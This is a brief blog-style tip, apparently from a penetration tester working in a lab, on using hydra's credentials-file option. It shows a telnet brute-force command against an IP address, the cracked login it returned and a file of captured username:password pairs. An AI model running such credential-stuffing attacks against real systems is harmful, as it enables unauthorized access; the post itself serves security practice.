Recently learned that hydra
can use a list of credentials rather than specifying separate lists of usernames and passwords. Target your bruteforce first with credentials that you have already compromised.
$ hydra -C loot/creds 10.129.3.94 telnet
...
[23][telnet] host: 10.129.3.94 login: security password: 4Cc3ssC0ntr0ller
$ tail -n 2 loot/creds
backup_admin:admin
security:4Cc3ssC0ntr0ller
I have used hydra
for years without realizing the credentials file option existed. Sometimes it pays to revisit the docs!
Bonus tip: Write good notes while hacking. Tremendous time-saver and it pays massive dividends even though it may be a painful habit at first.